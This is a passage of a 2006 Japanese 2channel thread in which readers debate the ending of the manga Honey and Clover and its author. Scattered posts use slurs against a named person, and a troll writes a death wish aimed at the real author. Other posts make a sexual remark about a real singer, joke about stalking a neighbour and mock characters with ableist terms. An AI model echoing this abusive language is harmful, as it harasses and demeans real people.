読み続けようと思うのですが、あのいたたまれないポエムが
それを邪魔します。
話に少し組み込む程度なら
あまり気にならなかったのかもしれませんが
毎回お約束のように出てくるとうんざりします。
最近では、必要以上のギャグ展開とポエムは
話が進まないのをごまかすためだと思うようになってしまいました。

作者である羽海野先生に疑問を抱くようになってしまったら、
夢中になっていたあの頃にはもう戻れませんね。
萌えとは繊細なもので、少しでも違和感を覚えると徐々に
崩れ去っていってしまうのかもしれません。
だけど、あの頃の甘くてやさしい萌えは思い出だからこそ、
きれいにいつまでも心に残ったままなのでしょう。

さようなら、ハチクロと羽海野チカ先生。
嫌いになったわけではありません。ただ、夢から覚めてしまっただけです。

259 :花と名無しさん:2006/09/07(木) 07:15:17 ID:ZyDalG0pO
ハチクロが急に終わったの高橋佳子が編集部に乗り込んだからだったりして
聖千秋の漫画の主人公の名前変更も高橋佳子のせいだったりして
あの基地害ならやりかねない

260 :花と名無しさん:2006/09/07(木) 07:19:35 ID:ZyDalG0pO
高橋佳子の絵は汚いしスクリーントーンも貼れないのに編集部にプロ気取りで載せろと乗り込む基地害

261 :花と名無しさん:2006/09/07(木) 07:49:56 ID:???0
ふたりは友達?

262 :花と名無しさん:2006/09/07(木) 07:56:53 ID:???O
ほかの漫画家や作者の性格や同人とか身の回りの事なんて どうでもいい
ハチクロ語れや
アホども

263 :高橋佳子:2006/09/07(木) 08:04:01 ID:???O
ハチクロキモいで〜す

264 :花と名無しさん:2006/09/07(木) 08:12:32 ID:???O
>>239
なんで作品を生み出した作者の話になると嫉妬なの?

作者のバックグラウンドあっての作品だろうが

265 :花と名無しさん:2006/09/07(木) 08:13:49 ID:???O
>>262
作者を完璧に抜きにして作品は語れないぞ
作品がひとりで勝手に生まれたわけじゃないんだから

266 :花と名無しさん:2006/09/07(木) 08:14:42 ID:???O
>>254
馬鹿www

267 :花と名無しさん:2006/09/07(木) 08:17:16 ID:???O
作者の漫画以外での作品アピールが多いからねぇ

268 :高橋佳子:2006/09/07(木) 08:31:12 ID:???O
私のプロデビューを返せ

269 :花と名無しさん:2006/09/07(木) 08:32:37 ID:???O
ハチクロって終わってたんだ
結局ハグの怪我編で終わったの?

270 :高橋佳子:2006/09/07(木) 08:35:16 ID:???O
私の河村隆一との対談を返せ

271 :高橋佳子:2006/09/07(木) 08:38:38 ID:???O
プロになりたかったよ〜。・゚・(つд∩)・゚・。なれるはずだったのに〜ヽ(`Д´)ノウワァァァァァン!!

272 :高橋佳子:2006/09/07(木) 08:41:27 ID:???O
あひゃひゃ

273 :高橋佳子:2006/09/07(木) 08:44:10 ID:???O
無理やりごり押しなんて卑怯だ

274 :花と名無しさん:2006/09/07(木) 09:04:10 ID:???0
携帯厨うぜぇ

275 :高橋佳子:2006/09/07(木) 09:21:25 ID:???O
デビューに向けて夢いっぱい
のだめのような名作なら仕方ないとあきらめます
しかしハチクロって何?ただごり押しじゃないかあ
あひゃひゃ

276 :花と名無しさん:2006/09/07(木) 09:21:30 ID:???0
もういい、しつこい、しゃらぁぁぁぁ〜ぷ!!!
ハチクロの話しよ=ぜ

277 :高橋佳子:2006/09/07(木) 09:25:30 ID:???O
私には絶望しかない
せっかくのチャンスをあんなごり押し漫画につぶされるなんて
私もコネ作れば異常なヨイショで売り出してもらえるのかなあ

278 :花と名無しさん:2006/09/07(木) 09:26:05 ID:???O
絵は好きだ

279 :高橋佳子:2006/09/07(木) 09:27:15 ID:???O
私をヨイショしてくれる出版社募集中
出世払いでお礼しますよ

280 :高橋佳子:2006/09/07(木) 09:28:40 ID:???O
絵がいいならイラストレーターになればよかったのに
なんで漫画描くんですかあ

281 :花と名無しさん:2006/09/07(木) 09:30:03 ID:ZyDalG0pO
世の中コネと売名
それがないから私のデビューは幻になりました

282 :花と名無しさん:2006/09/07(木) 09:35:23 ID:ZyDalG0pO
デビューするために親とケンカして状況したのにムダでした

283 :花と名無しさん:2006/09/07(木) 10:37:51 ID:???O
通報しました

284 :高橋佳子:2006/09/07(木) 12:09:18 ID:???O
岩井島子!モデル料払え!

285 :高橋佳子:2006/09/07(木) 12:15:42 ID:???O
ヽ(`Д´)ノウワァァァァァン!!

286 :花と名無しさん:2006/09/07(木) 12:21:54 ID:???0
それよりもデスノ小畑が逮捕されたw

287 :高橋佳子:2006/09/07(木) 12:28:55 ID:???O
漫画家って悪人じゃないとなれないんですね

288 :花と名無しさん:2006/09/07(木) 12:34:08 ID:???0
http://comic6.2ch.net/test/read.cgi/gcomic/1153692564
もんでんあきこ

289 :花と名無しさん:2006/09/07(木) 12:50:48 ID:???0
乗客に日本人はいませんでした
いませんでした
いませんでした


290 :花と名無しさん:2006/09/07(木) 13:01:55 ID:???0
なんでここにエロマンガ家兼、自らホモ絵を801板に投下してた
もんでんのスレが貼られるんだよ

291 :花と名無しさん:2006/09/07(木) 13:07:46 ID:???0
801つながり?

292 :花と名無しさん:2006/09/07(木) 13:12:18 ID:???0
前にFF12のホモ絵描いて自分で投下してマンセーされて
何回か調子こいて投下してたら、その事でそのスレがちょっと荒れてたw

293 :花と名無しさん:2006/09/07(木) 13:14:26 ID:???0
もんでんスレも変なの湧いたなw
夏だけじゃなく季節の変わり目って多いんだな。

294 :高橋佳子:2006/09/07(木) 13:26:38 ID:???O
素晴らしいもんでんさんのスレ荒らすなんて許せない
極悪海野のスレを荒らすべきだ

295 :高橋佳子:2006/09/07(木) 13:30:24 ID:???O
海野氏ね

296 :花と名無しさん:2006/09/07(木) 13:48:21 ID:???0
羽海野さんとは関係ない
高橋なんとかの中傷書いてる人、いいかげんにしといたほうがいいよ。
「しゅーまっは」作者(漫画家)のスレで中傷書いてた人(通称汚物)が
裁判で訴えられたことがあるんだから。

297 :高橋佳子:2006/09/07(木) 14:03:05 ID:???O
海野の個人情報なんかさらしてないよ〜

298 :花と名無しさん:2006/09/07(木) 14:10:44 ID:???0
ずっと昨日からカキコしてる漫画家?の高橋佳子という人が存在する上で書いてるのなら
問題ありだけど、脳内なら…
どのみちウミノさんとは関係のない話題だからやめて欲しい。
度が過ぎるとアク禁食らうよ。

299 :高橋佳子:2006/09/07(木) 14:11:44 ID:???O
てか別に掴まってもいいよ
どうせこれから頑張ってもプロにはなれないし
ダークヒーローもいいかも

300 :高橋佳子:2006/09/07(木) 14:13:27 ID:???O
ダークヒーロー見参!かっこいい!やっぱりレッドがいいなあ

301 :花と名無しさん:2006/09/07(木) 15:20:36 ID:???0
あなたは足経験ながいのか?

302 :高橋佳子:2006/09/07(木) 17:04:21 ID:???0
毎日2回、隆一でオナニーしてる

303 :花と名無しさん:2006/09/07(木) 17:29:20 ID:???O
そんなことばかりするから漫画家になれなry

304 :花と名無しさん:2006/09/07(木) 17:56:21 ID:???0
携帯でよく頑張るなw

305 :花と名無しさん:2006/09/07(木) 18:35:07 ID:???0
ウミノ先生の漫画を読めるのはコーラスだけ!

306 :花と名無しさん:2006/09/07(木) 18:49:44 ID:???O
本屋はしごして10巻かってきたよ

307 :花と名無しさん:2006/09/07(木) 20:10:00 ID:???0
ウミノ先生の表に出しておく必要がある説明が読めないのはコーラスだけ!

308 :花と名無しさん:2006/09/07(木) 20:14:14 ID:???0
私も10巻買ってきた。本誌立ち読みだったからウロだけど、
最終回4ページくらい加筆されてないかな?違ったらごめん。

309 :花と名無しさん:2006/09/07(木) 20:47:55 ID:???O
くそ 青森は 明後日かな

310 :花と名無しさん:2006/09/07(木) 20:59:30 ID:???O
どの辺りが加筆されてたんですか?

311 :3008:2006/09/07(木) 21:10:36 ID:???O
なんか森田がはぐに電話かけて
『森田忍は世界中の誰よりも花本修司を愛してます』
って
凄い修正だよね

312 :花と名無しさん:2006/09/07(木) 21:11:42 ID:rZtjoUzgO
コンビニには売ってるかな?

313 :花と名無しさん:2006/09/07(木) 21:18:58 ID:???0
竹本くんがアパートを出てから新幹線に乗るまでの間。
この部分本誌で見た記憶がない。違ってたら本当にゴメン。というか恥ずかしい。
ネタバレ注意です。


駅に向かう途中、丸栄ベーカリーの紙袋を持って走るはぐを見かける竹本くん。
声をかけようと思ったけど、お別れは昨日済ませたし、今声をかけたら
言わなくてもいいことを言って困らせてしまう、と遠くから見つめる竹本くん。

314 :花と名無しさん:2006/09/07(木) 21:30:01 ID:wE1XyTlo0
いまカラ10巻買ってきます。。。

315 :花と名無しさん:2006/09/07(木) 21:43:08 ID:???O
レス読んで10巻を買いに家を飛び出し、10日発売なのを知って愕然として帰ってきた私が来ましたよorz

316 :花と名無しさん:2006/09/07(木) 21:52:39 ID:???0
作者が前に出すぎると作品もガタガタになるっとホントだね。

317 :花と名無しさん:2006/09/07(木) 22:08:00 ID:???0
ウミノ作品はハチクロしか知らないけど、
どんな題材の漫画を描いても同人臭くなってしまうんだろうな、と思う。

もしもウミノが超こち亀に参加したら、
緩いウエーブの髪でオシャレめがねの寺井や、
両津にいじめられながらはわわーとか言う麗子や、
不幸で存在感が全くない中川や、
麗子のことを好きさ!大好きさ!とかいう両津が拝めるんだろうな…。

318 :花と名無しさん:2006/09/07(木) 22:35:36 ID:???0
10巻読みました。あまずっぱーい。
いいんじゃないですか、甘酸っぱいストーリーで。
自分も竹本派ですが彼は技術は三流だが努力は一流
である意味天才だと思う。
はぐは前の髪型も捨てずらい。


319 :花と名無しさん:2006/09/07(木) 22:41:05 ID:???0
空飛ぶポニーに乗って、心のかけらを探す旅に出ます。


320 :花と名無しさん:2006/09/07(木) 22:42:08 ID:???0
782 :花と名無しさん :2006/09/07(木) 22:29:49 ID:???0
年の差カップルスキーだけど、楽園はダメだけどハチクロはアリだ。
楽園は…男みたいにトランクス履いてた時代とかを思い出すとキモいし
婚約者に対する一の態度が人として最低だったから嫌。
ハチクロはそういう嫌な感じは無い。
むしろ、森田との恋より大きな愛を選んだ感じがして爽快だった。

321 :花と名無しさん:2006/09/07(木) 22:49:30 ID:???O
>>317
お前の妄想癖が心配

322 :花と名無しさん:2006/09/07(木) 23:10:25 ID:???O
>>320
大きな愛(笑)
男への依存度の違いで評価が変わるんだろうか

323 :花と名無しさん:2006/09/07(木) 23:11:37 ID:???O
>>318
まだ8黒に甘酸っぱいって言えるのが裏山

324 :花と名無しさん:2006/09/07(木) 23:36:08 ID:???0
>>315
ん…?10日に延期になったのか?8日じゃなくて?

325 :花と名無しさん:2006/09/08(金) 01:14:52 ID:???O
なんか今原作見ないでアニメみたら
はぐと修もありっちゃありだな。うん。

326 :花と名無しさん:2006/09/08(金) 01:15:36 ID:???0
愛といっても修司へのじゃなくて芸術へのだよなあ

327 :花と名無しさん:2006/09/08(金) 01:18:13 ID:???0
森田のただ生きて〜の台詞は馨に対してもあてはまるんじゃないかな

328 :花と名無しさん:2006/09/08(金) 01:19:31 ID:???O
まぁ確かに。でもはぐにとって雨らしいから。そこら辺は。

329 :花と名無しさん:2006/09/08(金) 01:27:41 ID:wXzr9qE+0
原作知らんけどさっきアニメやってたから初めて見た
主人公の女の子が3人の男にモテてて絵描きたいけどケガしちゃったのだけどアタシ必ず治すわ
って

やっすい話だな、とおもった

330 :花と名無しさん:2006/09/08(金) 01:27:59 ID:???0
>>324
公式には8日でしょ。
フライングで7日に手に入ってる人もいる、と。

331 :花と名無しさん:2006/09/08(金) 01:35:23 ID:d7vzOADiO
まだ、最終回じゃないでしょ?

332 :花と名無しさん:2006/09/08(金) 01:39:55 ID:???0
最終回だよ

333 :花と名無しさん:2006/09/08(金) 01:45:42 ID:???O
あらあ?なんか意外に 好評だな 今日のアニメ話 アニメスレじゃ修はぐでも納得してる奴多い
ムカつく・・・・

334 :花と名無しさん:2006/09/08(金) 02:26:45 ID:???0
読者の想像におまかせエンドなのがスッキリしなくてすごく嫌。
竹本はぐ森田の3角関係がいきなり修はぐ森田にすり変わってるし。
はぐのケガと修の恋愛感情が無かったら良かったのになぁ。

335 :花と名無しさん:2006/09/08(金) 02:31:45 ID:???0
>>333
アニメでさらっと見るのと
毎月毎月長い間見てきた人とじゃ思い入れも感じ方違うよ
しょうがないよ…

336 :花と名無しさん:2006/09/08(金) 02:41:02 ID:???0
アニメを飛び飛びで観てるのでちょっとわからないんですが、
森田?が戻ってくる回をさっき観たんですが、修のはぐへの気持ちは
恋愛感情なんですか?
ハチクロ1を飛び飛びで観てた時は家族愛っぽかったので、
どっちなのかなと。
>>334を観る限り、原作でも、竹本と修がはぐに恋愛感情ってことで
いいんでしょうか?
森田は、はぐの怪我以降くっつこうとしてるみたいな感じで。

337 :花と名無しさん:2006/09/08(金) 04:42:30 ID:???0
家族愛なんじゃねえの? ふつうに流れで読めば。
でも10巻だけ読めば完全に恋愛感情。伏線なし。
森田とはぐは「すれ違った」というより、森田が私事で
ぼろぼろになって、はぐに見限られただけ。

338 :花と名無しさん:2006/09/08(金) 04:48:10 ID:???O
>333
アニメは臭はぐ納得した人多いのか…

アニメ・映画は描写不足で納得出来なかったけど
原作読むと細かくちゃんと描かれていて納得…というのが普通は多いのだが
ハチクロは逆だねぇ

339 :花と名無しさん:2006/09/08(金) 04:56:33 ID:???0
10巻コンビニで立ち読みしてようやく結末が読めた。
確かにこりゃ読者は怒るわ。方向転換が急すぎ。
なんといっても、はぐお姫様は絶対という構図はなんとかならなかったのか。
誰もがそれぞれなんらか人間関係に軋轢抱えてて、実は一番人付き合いの
へたくそだったはぐの一人勝ちという感じ。この漫画の真の主人公ははぐ。
3人の男に想われたモテモテ女。しかしはぐは趣味を選び、3人から修
という無二のパートナーの人生までも手に入れる。そしてこれからも
これまでと変わらない生活を続けていくだろうことが読み取れる。つまり
他の人物はそれぞれの道を選んで「ハチクロ」の世界からは去っていくが、
はぐの物語だけはこれからも終わらないのだ。
ことに、はぐに思いを寄せて敗れた男たち(森田、竹本)が本来持っていた
キャラクターの魅力をもぎ取られ、薄っぺらいボロ切れのようになって
それぞれ舞台から消えていくところは薄ら寒くすらあった。オロソシス。

340 :花と名無しさん:2006/09/08(金) 05:02:01 ID:LV8wCiuAO
アニメはさらっと見れた
うみのたんのアクが薄くなってて漫画のとんでもない展開も納得
単に演出の腕が良いだけかも知れん

341 :花と名無しさん:2006/09/08(金) 05:33:28 ID:???0
ありがとうございました。
ラストではぐは修を選ぶんですね。
じゃあ、リハビリが続いてる状態で終わったのかな。
まぁはぐは絵が第一みたいだし、森田だと修ほど献身的に
リハビリに付き合ってくれることはないだろうし、
何年もかかりそうなはぐのリハビリに全てを捧げたら森田も
創作活動できなさそうだから、それはそれでアリなのかな。
修は先生だったから、何年か空いてもそんなに支障なさそうだし。
竹本はあまり役に立たなさそうだから、選ばれなくても仕方ないかも・・・。
はぐって恋愛より絵って感じだし(飛び飛びでアニメ観ただけですが)

リハビリ後設定の最終回で、見当違いのこと言ってたらすみません。
ありがとうございました。

342 :花と名無しさん:2006/09/08(金) 05:35:53 ID:???0
ああわかりづらかった。
「修という無二のパートナーの人生」とあったので、
>>341は、リハビリ中前提で思ったことを書いたんですが、
もしも違ってて、最終回がリハビリ後の話で修を選択したとか
だったら見当違いだと思います、すみません、という意味でした。

343 :花と名無しさん:2006/09/08(金) 05:53:45 ID:???0
9巻出たばっかりだと思ってたけど
もう10巻出てるのか・・・・。


344 :花と名無しさん:2006/09/08(金) 06:00:00 ID:???0
結局、各自が自分の仕事をとって、あとは、それにあうように人を利用するというラストですか。なんだかなぁ。。。。

345 :花と名無しさん:2006/09/08(金) 06:54:57 ID:???0
>>337
修の「好きさ、大好きさ」がなければ
家族愛だったよね・・・

346 :花と名無しさん:2006/09/08(金) 06:57:03 ID:???0
>>341
半年足らずで竹本の自転車の荷台に
怪我した手でつかまって二人乗りできるくらいに回復しました。
これで人生もらうんだからさすが姫。

347 :花と名無しさん:2006/09/08(金) 07:28:50 ID:???0
最後まではぐって好きになれなかった

348 :花と名無しさん:2006/09/08(金) 07:32:43 ID:???0
はぐが完全に姫になってしまったのが痛かったな。
自分の好きな道を選んで、
男もそれを許してくれる人を選択出来る。

完全無敵状態。

349 :花と名無しさん:2006/09/08(金) 07:39:17 ID:KQ4Vj6WV0
いま十巻読了
最後らへん修が入ってきたとこはちょっと気持ち悪くもあったけど(おっさん張り合ってんじゃねぇよw)
まぁ全体的には上手くまとめたんじゃないの
なかなか良かったと思うよ

しかし作品としては崩壊しすぎだろw
思いついたことからボンボン詰め込んでくって感じだなこのおばはん作者はw

350 :花と名無しさん:2006/09/08(金) 07:48:17 ID:???O
そのくせインタビューでは、いかにも緻密に設定してます発言ばっかり。
もうね(ry

351 :349:2006/09/08(金) 08:18:43 ID:KQ4Vj6WV0
あ、それとスイッチ云々の話あったじゃん?
俺なら押すねwwwwwあの気色悪い犬一匹どーなろーと知ったこっちゃないよwwwwwwww

352 :花と名無しさん:2006/09/08(金) 08:34:18 ID:???0
表紙の画像まだ?
それだけ見たらもういいや9巻までブコフ出すし

353 :花と名無しさん:2006/09/08(金) 09:26:51 ID:jSIPtqykO
結局はぐが男より自分のやりたい事を選んだの??

354 :花と名無しさん:2006/09/08(金) 09:42:39 ID:???0
>>353
スレの見解としてはそうらしい
けど実際修もはぐにとって欠かせない人間ではあると思うんだが…

355 :花と名無しさん:2006/09/08(金) 09:57:01 ID:???0
両者に共依存的な利害の一致は感じる
ただそれが恋愛関係なのかはわからないな
少なくともはぐのそれは恋愛感情には思えない

356 :花と名無しさん:2006/09/08(金) 10:04:27 ID:3nB/6s0f0
>>354
スレの見解でもなんでもなく普通に読解してそうだろ。

はぐが選んだのは自分のやりたいこと。それを支える都合のいい人間として修を選んだ。
森田もクリエイターの同胞としてはぐのパートナーになる可能性はあったが、
森田ははぐと同じクリエイターであるが故にはぐのために捨て身にはなれない人間だった。
はぐがリタイアしたとき、なにもない修しかはぐを支えることはできなかったわけだ。
これはすれ違いというより、論理的に説明のできる冷徹な打算だな。


357 :花と名無しさん:2006/09/08(金) 10:07:08 ID:???O
恋愛する相手としてではなく芸術活動のパートナーとしてだからね

358 :花と名無しさん:2006/09/08(金) 10:07:47 ID:???0
大体修(遅れた大人)が子供の中に舞い戻って青春していいんだよ
なんて都合のいいメッセージは要らん。
遅れた大人は遅れたなりの人生を遅れた仲間内で歩むべき。
青春は戻らないからこそ青春なのです。

359 :花と名無しさん:2006/09/08(金) 10:08:02 ID:3nB/6s0f0
簡潔にまとめりゃこういうことだ。

天才が、人生の全てを捧げさせることのできる空虚な人間を手に入れた。
空虚な人間が、挫折した天才を支えるという自分の居場所を見つけた。

なんて内向的でみじめで退廃的で無様な関係なんだ…。



360 :花と名無しさん:2006/09/08(金) 10:09:33 ID:???0
気持ちよくない終わり方だった

361 :花と名無しさん:2006/09/08(金) 10:17:22 ID:???0
修は原田やリカと暮らしてた時代に
原田もリカも好きだなんてお人よしこいてないで
竹本のように自立してちゃんとリカを原田から奪う気でいれば良かったんだ。
でも、それはそれで自分で苦しみそうだな

今回はぐを手に入れても、後から勝手にひとりで苦しんでそうだが。
内省的童貞中年のポエムはタチが悪いからな

362 :花と名無しさん:2006/09/08(金) 10:27:07 ID:3nB/6s0f0
少なくとも修は、はぐの求める「一緒に無数の箱をあけるために戦ってくれる人間」には
なれんだろう。箱をあけられるのは「才能のある人間」「表現者」「芸術家」だからだ。
修は怪我をした今のはぐに必要ではあっても、回復してからは不必要になる。
少なくともはぐにとって家族のような帰る場所ではあっても、一緒に戦う人間ではない。
共に戦い、刺激しあい、高めあっていく関係にあったのは森田だった。
はぐは結局、家に引きこもることになったようなものだ。

修とはぐを恋愛関係として捉えるのはどのみち無理があるな。


363 :花と名無しさん:2006/09/08(金) 10:27:18 ID:???0
消化不良な終焉にこっちが腕ギチギチ噛みたい気分だよ((((;゚д゚))))

364 :花と名無しさん:2006/09/08(金) 10:53:10 ID:???O
女が甘えたままのエンド

365 :花と名無しさん:2006/09/08(金) 11:00:25 ID:???0
('A`;) やっぱエロゲ脳な俺は読解がおかしいのか…

>>362
いや、別に戦って刺激しあって高めあうのが目的だったら恋愛関係である必要は無いだろ
同様に修がはぐを支えるのが目的なら家族関係で十分だとも思うが
でも普通に考えて従兄弟の娘な親戚に一生家族関係であるなんて無いだろと

んでまあ修がはぐと一緒に戦うか否かっつーならアニメの方では11話で「それをケアするのがおまえの役目だろ」って
シーンの回想が入ったわけで。そういう面で支えていくのは一緒に戦うとは言えないのか?

366 :花と名無しさん:2006/09/08(金) 11:06:02 ID:???0
はぐがケアされっぱなしじゃなきゃならん人間だからつまんないんだよ
電波塔に閉じ込められた姫のまま終わってしまった

367 :花と名無しさん:2006/09/08(金) 11:12:17 ID:???0
閉じてる人

368 :花と名無しさん:2006/09/08(金) 11:16:43 ID:???0
はぐって障害者だったのかよってくらいの天使設定が駄目

369 :花と名無しさん:2006/09/08(金) 11:21:57 ID:???0
>>368
病的なまでに内向的、もしくは一種のサヴァン的な人間だと勝手に思ってた

370 :花と名無しさん:2006/09/08(金) 11:28:46 ID:???0
>>365
修との関係はどこまでいっても家族的な依存関係でしかない。

確かに森田とは恋愛関係になる必要はない。
しかしはぐにとって外交的な、一個の独立した人間としての関係を築ける相手
という意味では森田しかいなかった。より恋愛に近い関係はこちらだろう。

371 :花と名無しさん:2006/09/08(金) 11:29:37 ID:???0
このラスト誉めてる主婦層なんて、惰性の典型みたいなものでしょ。
冬ソナにはまった勢いで空港に4出迎えして韓国行ったまではいいけど
さらになんだか知らないうちに
パチンコ冬のソナタにまでかよってしまってるだけじゃ?

372 :花と名無しさん:2006/09/08(金) 11:31:40 ID:???0
それになにより、森田に対しては純粋な恋愛感情をもってたんだよ。はぐは…。

373 :花と名無しさん:2006/09/08(金) 11:31:55 ID:???0
>>369
打算と計算に満ちたサヴァンで天使なんて駄目でしょう…

ピュアピュア☆彡

374 :花と名無しさん:2006/09/08(金) 11:40:22 ID:???0
>>369


ほんとうは怖いグリム童話を思い出したよ

375 :花と名無しさん:2006/09/08(金) 11:44:54 ID:???0
>>361
修ちゃんは恋愛の対象として
リカを見てたとは思えないんだが。

376 :花と名無しさん:2006/09/08(金) 11:48:20 ID:???0
>>375
そのころ子供過ぎて性の目覚めがまだだったからって
30代半ばでロリコンが認められるわけでもない。
話をつまらなくしたのは重罪

377 :花と名無しさん:2006/09/08(金) 11:52:21 ID:???0
>>376
??

378 :花と名無しさん:2006/09/08(金) 11:54:50 ID:???0
>>376
30代半ばの男が22歳の女を好きになってロリコンってどうよwwwwww

379 :花と名無しさん:2006/09/08(金) 11:57:17 ID:???0
もしかして、
最初からはぐをメンヘル女と思っていたのは俺だけなのか?

380 :花と名無しさん:2006/09/08(金) 11:57:55 ID:???O
結局修ってなんだったんだ?
本人は満足してるみたいだが
竹本とはぐのセリフを見る限りじゃ、使ってくれと言ってる人がいるんだから使いなよ・・・無理にお返しをする必要はないんじゃないかな? ありがとう
ってとらえたんだが・・・・・違う?そうしか解釈できなかったんだが・・・・



>>352
ブクオフはやめとけって 激安だぞ

381 :花と名無しさん:2006/09/08(金) 11:59:44 ID:???0
>>378
見た目小学生で中身が障害者なんだからロリコンだろう。

382 :花と名無しさん:2006/09/08(金) 12:01:09 ID:???0
>>379
俺も俺も
>>381
それ言ったら26歳だか27歳の森田でも似たようなもんだろ…

383 :花と名無しさん:2006/09/08(金) 12:03:12 ID:???0
>>382
森田は自分もサヴァン。竹本は青い果実。

修は変態

384 :花と名無しさん:2006/09/08(金) 12:07:28 ID:???0
竹田!!

385 :花と名無しさん:2006/09/08(金) 12:07:43 ID:???0
>>379
私も。>はぐは最初からメンヘル

しかしまさかここまで酷いとは思わなかった。
はぐみもいつまでも幼稚なメンヘル少女のままじゃなくて
絵画教室の先生をやるなどで、だんだん成長して
変わっていくものだとばっかり思ってたから。

主人公が稚拙な人間でも、ストーリーが進むにつれて
成長するんならイイんだが
そうはならなかったからなぁ…。

羽海野さんは何を描きたかったんだろう。

386 :花と名無しさん:2006/09/08(金) 12:08:46 ID:???0
>>380
だからいってるだろ。修は空虚な人間だって。才能もなにもない凡人。
一度、人生を捨てて廃人になった人間。

修は別に立派でもなんでもなく、何もない人間だから、はぐに全部を捧げることが
できたというだけ。そしてそのことに生きる意義を見出した哀れな人間。
そりゃ、将来のある森田や竹本にはできない。

もし修がはぐになにか見返りを求めたら、あの関係はあっさり破局するだろうな。

387 :花と名無しさん:2006/09/08(金) 12:13:36 ID:???O
>>386
なるほど

388 :花と名無しさん:2006/09/08(金) 12:20:45 ID:???O
>>333
うわっ性格わるそっ。

389 :花と名無しさん:2006/09/08(金) 12:31:43 ID:???0
まったくさわやかじゃないじゃん

390 :花と名無しさん:2006/09/08(金) 12:36:03 ID:???0
修はアレ…はぐが恋愛とか性的な対象になるのかな?

391 :花と名無しさん:2006/09/08(金) 12:44:09 ID:???0
竹本はこれからも分をわきまえて生きていくだろう。

山田には希望が見える。真山は一番幸せになった。

はぐ、修は互いに人間として甘えあったまま、これからも生きていく。

森田ははぐに全てを捧げられた非才の修へのコンプレックスを抱いたまま、
天才ゆえ仕事に打ち込むだけの孤独な人生が続いていくだろう。

392 :花と名無しさん:2006/09/08(金) 12:48:59 ID:???O
本屋いっちゃたよ、けなげな受験生ね貴重な昼休みを返してくれ。

393 :花と名無しさん:2006/09/08(金) 13:03:09 ID:???0
竹本が一番普通に幸せになれる気がする

394 :花と名無しさん:2006/09/08(金) 13:04:22 ID:???O
別に修ははぐに利用されても良いって思ってんだろうな…。
や、はぐはそんな事する(出来る)子じゃないけど。
結果的にそうなっても構わないってカンジ。
恋愛感情とか超越してんじゃないかな。
そんな自分は森はぐ派ですがorz

395 :花と名無しさん:2006/09/08(金) 13:05:27 ID:sQDLuGnvO
10巻読んで、号泣した私は惰性の主婦かな

396 :花と名無しさん:2006/09/08(金) 13:08:43 ID:???0
あんな展開にした割りにはいい最終回だと思いました

397 :花と名無しさん:2006/09/08(金) 13:17:54 ID:lPbr8wvEO
浪人生活に潤いをくれた漫画だったダス。

俺も真山を見習って大好きで憧れの新妻である
あの人の幸せを願って監視する日々を送るダス☆
まぁ、隣に越してきた奥さんなんだけど☆☆☆

398 :花と名無しさん:2006/09/08(金) 13:24:35 ID:???0
変態ストーカーを見習って犯罪者になりたいのか?w

399 :花と名無しさん:2006/09/08(金) 13:35:37 ID:???O
真山 アニメじゃ
鍵開けるの 諦めたのか 部屋の前で座ってボーとしてたな
5人のセリフに無理やり入り込んで『わかるはずもなかったんだ』 みたいなセリフ言ってたが
当たり前だ みたいな

400 :花と名無しさん:2006/09/08(金) 14:16:12 ID:???0
真山は情熱は買うが行動がキモ過ぎて支持できない
まぁリカみたいな女にはああいう男が合ってるのかもしれんが

401 :花と名無しさん:2006/09/08(金) 14:45:26 ID:???0
真山がキモいのは、羽海野さんの理想どおりなんでしょ。
映画版で真山がもっと犯罪ぽいヤバイストーカーに描かれてたのを
自分が描いた真山よりも萌えたようなことをインタビューで語ってたし。

402 :花と名無しさん:2006/09/08(金) 14:46:54 ID:VHa3HK+40
流れぶったギリですまん。
ハチクロが終わってしまった。今日、コンビニで最終巻を見つけてしまった。かった。
かなしい。かなしい。寂しい。寂しい。

403 :花と名無しさん:2006/09/08(金) 14:58:46 ID:???O
物凄く流れを豚切っちゃって申し訳ないんだけど、1つ聞いていい?
9巻で、病院にはぐパパ達が来た時にあった、「彼女の故郷はもう姿を変えたのだ」みたいなの、あるよね?
あれってどういう意味?右手が故障したから絵を描くのがダメになったと思ったはぐパパが、「絵を描かないなら帰ってくるな」みたいな事言ったの?

404 :花と名無しさん:2006/09/08(金) 15:01:20 ID:NIU0XfRXO
パパが新しい女を連れてきたから
女は妊娠している

405 :花と名無しさん:2006/09/08(金) 15:01:31 ID:rZ9oj8d+O
私は今ハチクロ最終巻買ってきたとこです…。
いつ読もうかものすごく迷う…。
終わらせるのが怖いし、どう環境を整えて読むのがベストか考え中ですW
こんな人います?

406 :花と名無しさん:2006/09/08(金) 15:03:34 ID:???0
終わって良かったよ。
これ以上続けていたらもっと酷いことになってた。

407 :花と名無しさん:2006/09/08(金) 15:08:31 ID:???0
>>404
まじで?

408 :花と名無しさん:2006/09/08(金) 15:14:54 ID:???0
最終巻、あとがき漫画が一番面白かった…。

409 :花と名無しさん:2006/09/08(金) 15:21:11 ID:???0
はぐあゆリカ、3人共他の男に気持ちを残したままで
まるごと受け止めて尽くしてくれる王子様ゲット(キープ?)

一人ぐらい別パターンにしてくれよ・・・

410 :花と名無しさん:2006/09/08(金) 15:25:00 ID:???0
>>409
三人とも何かあったら速効で破局しそう。

411 :花と名無しさん:2006/09/08(金) 15:37:45 ID:???O
>>407
マジです
だから帰る場所が無くなったとか言ってる


412 :花と名無しさん:2006/09/08(金) 16:00:19 ID:???0
10巻読んだ。

ハチミツかクローバーかっつうと、クローバーでしたな。
この非常にもやもやした感じはスガシカオ初期だw

前巻からの展開としては、このスッキリしない感じが良いのかもしれない。
安易なハッピーエンドよりは納得できる。終わってない感じがまた何とも。

413 :花と名無しさん:2006/09/08(金) 16:07:12 ID:IyCwMX/hO
スピンオフバージョンってなんぞや?

414 :花と名無しさん:2006/09/08(金) 16:07:22 ID:???0
星のオペラ、なんかハァハァする生き物いっぱいでたまらんかったよ
あと子供の頃ザネリにすごくむかついたのを思い出して笑った

415 :花と名無しさん:2006/09/08(金) 16:32:08 ID:???0
最近は本誌もサラーッと読んでたから自信ないんだが
どえらく書き換わってない?>10巻

416 :花と名無しさん:2006/09/08(金) 16:32:59 ID:???0
とりあえず10巻買って途中まで読んだコミクス派。
なんつーか、9巻でおや?と思ったけど
突然修で何かこう…鳶に油揚げもって行かれたような呆然感なんだがw


417 :花と名無しさん:2006/09/08(金) 16:33:56 ID:???0
×突然修で
○突然修介入で

418 :花と名無しさん:2006/09/08(金) 16:45:26 ID:???0
竹本が一番好きで共感もしてるんだが
最後の殴り合いのとこの竹本の台詞はえ?って感じだ
竹本、ちょっと性格変わったよな
自転車以来、成長もしたし森田と対等に渡れるようになったけどなーんかこう…
